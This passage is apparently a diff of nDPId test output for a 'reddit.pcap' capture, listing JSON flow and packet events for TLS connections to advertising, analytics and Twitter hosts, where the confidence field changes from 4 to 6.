{"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"c.aaxads.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00929{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1935,"source":"reddit.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686996,"flow_last_seen":1605291687024,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687024,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3b6","src_port":38320,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"c.aaxads.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1936,"source":"reddit.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686985,"flow_last_seen":1605291687024,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687024,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::df9:21c6","src_port":43492,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"c.amazon-adsystem.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1938,"source":"reddit.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686985,"flow_last_seen":1605291687060,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291687060,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":50960,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.googletagservices.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00991{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1949,"source":"reddit.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686985,"flow_last_seen":1605291687075,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291687075,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::df9:21c6","src_port":43492,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"c.amazon-adsystem.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00970{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1962,"source":"reddit.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686996,"flow_last_seen":1605291687096,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291687096,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3b6","src_port":38320,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"c.aaxads.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2333,"source":"reddit.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291687485,"flow_last_seen":1605291687485,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291687485,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::acd9:12c2","src_port":51026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2333,"source":"reddit.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1605291687485,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687485,"pkt":"qtsDr8lk5EKm5WPyht1gDGJhACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACs2RLCx1IBu5\/PXZ4AAAAAoAL9IP2VAAACBAWgBAIICruOxrcAAAAAAQMDBw=="} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2341,"source":"reddit.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1605291687512,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687512,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAKzZEsIqAcsBIEmLB5kd7IUo3\/YpAbvHUvrRnoyfz12foBJXgAjWAAACBAV4AQMDAwQCCArC1z5Fu47Gtw=="} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2342,"source":"reddit.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1605291687513,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687513,"pkt":"qtsDr8lk5EKm5WPyht1gDGJhACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACs2RLCx1IBu5\/PXZ\/60Z6NgBAB+4zMAAABAQgKu47G0sLXPkU="} 
-00970{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2343,"source":"reddit.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687485,"flow_last_seen":1605291687513,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687513,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::acd9:12c2","src_port":51026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"securepubads.g.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00970{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2343,"source":"reddit.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687485,"flow_last_seen":1605291687513,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687513,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::acd9:12c2","src_port":51026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"securepubads.g.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2344,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291687514,"flow_last_seen":1605291687514,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291687514,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2344,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1605291687514,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687514,"pkt":"qtsDr8lk5EKm5WPyht1gD4BTACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXidvHABuwi2N5MAAAAAoAL9IOSoAAACBAWgBAIICiRA7pIAAAAAAQMDBw=="} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2351,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1605291687545,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687545,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleJ0qAcsBIEmLB5kd7IUo3\/YpAbu8cGxxKx0ItjeUoBJXgPGUAAACBAV4AQMDAwQCCArC1z5pJEDukg=="} 
00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2353,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1605291687545,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687545,"pkt":"qtsDr8lk5EKm5WPyht1gD4BTACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXidvHABuwi2N5RscSsegBAB+3WHAAABAQgKJEDuscLXPmk="} -00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2355,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687514,"flow_last_seen":1605291687545,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687545,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"platform.twitter.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-01011{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2356,"source":"reddit.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687485,"flow_last_seen":1605291687552,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291687552,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::acd9:12c2","src_port":51026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"securepubads.g.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2382,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687514,"flow_last_seen":1605291687606,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291687606,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"platform.twitter.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01336{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2390,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291687514,"flow_last_seen":1605291687606,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"thread_ts_msec":1605291687606,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"platform.twitter.com","server_names":"platform.twitter.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Twitter, Inc., OU=Twitter Security, CN=platform.twitter.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"2B:30:10:3B:07:2F:F2:EB:3D:08:E3:BB:45:61:F7:A3:9F:4C:A7:92"}} 
+00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2355,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687514,"flow_last_seen":1605291687545,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687545,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"platform.twitter.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01011{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2356,"source":"reddit.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687485,"flow_last_seen":1605291687552,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291687552,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::acd9:12c2","src_port":51026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"securepubads.g.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2382,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687514,"flow_last_seen":1605291687606,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291687606,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"platform.twitter.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01336{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2390,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291687514,"flow_last_seen":1605291687606,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"thread_ts_msec":1605291687606,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"platform.twitter.com","server_names":"platform.twitter.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, 
O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Twitter, Inc., OU=Twitter Security, CN=platform.twitter.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"2B:30:10:3B:07:2F:F2:EB:3D:08:E3:BB:45:61:F7:A3:9F:4C:A7:92"}} 00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2460,"source":"reddit.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291687642,"flow_last_seen":1605291687642,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291687642,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2008","src_port":39520,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2460,"source":"reddit.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1605291687642,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687642,"pkt":"qtsDr8lk5EKm5WPyht1gDI7+ACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACAImmABu4PHuxgAAAAAoAL9IGTNAAACBAWgBAIICsL4XLwAAAAAAQMDBw=="} 
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2543,"source":"reddit.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1605291687676,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687676,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgWAAAAAAAAIAgqAcsBIEmLB5kd7IUo3\/YpAbuaYOcfuuGDx7sZoBJXgGbFAAACBAV4AQMDAwQCCArC1z7qwvhcvA=="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2544,"source":"reddit.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1605291687676,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687676,"pkt":"qtsDr8lk5EKm5WPyht1gDI7+ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACAImmABu4PHuxnnH7rigBAB++qzAAABAQgKwvhc38LXPuo="} -00968{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2546,"source":"reddit.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687642,"flow_last_seen":1605291687678,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687678,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2008","src_port":39520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.googletagmanager.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2554,"source":"reddit.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687642,"flow_last_seen":1605291687721,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291687721,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2008","src_port":39520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.googletagmanager.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00968{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2546,"source":"reddit.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687642,"flow_last_seen":1605291687678,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687678,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2008","src_port":39520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.googletagmanager.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
